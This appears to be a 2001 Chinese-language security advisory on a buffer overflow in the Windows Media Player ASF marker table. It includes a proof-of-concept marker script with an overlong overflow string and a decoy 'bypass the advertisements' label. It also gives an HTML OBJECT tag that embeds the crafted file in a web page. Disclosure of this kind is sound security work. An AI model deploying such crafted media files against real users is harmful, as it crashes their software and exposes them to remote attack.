MS Windows Media Player ASF Marker 存在缓冲溢出漏洞发布时间:2001-08-08 更新时间:2001-08-08 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:客户机模式 受影响系统 MS Windows详细描述 在.ASF视频文件中嵌入一段很长的marker,当目标用户点marker 查看下面的列表时候WMP会崩溃。 测试代码 使用ASFCHOP.EXE把下面的脚本嵌入到任何ASF文件中: ----8<----cut-here-----8<---- start_marker_table 0.0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC 0.1 Click here to bypass the advertisements! end_marker_table ----8<----cut-here-----8<---- 点击后WMP会崩溃。 <OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1 name=DSPlay1 type="application/x-oleobject"> <PARAM NAME="ShowControls" VALUE="-1"> <PARAM NAME="ShowGotoBar" VALUE="1"> <PARAM NAME="ShowStatusBar" VALUE="1"> <PARAM NAME="ControlType" VALUE="2"> <PARAM NAME="Filename" VALUE="a.asf"> <PARAM NAME="InvokeURLs" VALUE="-1"> </OBJECT> 解决方案 尚无 相关信息 Pauli Ojanpera (pauli_ojanpera@hotmail.com) |
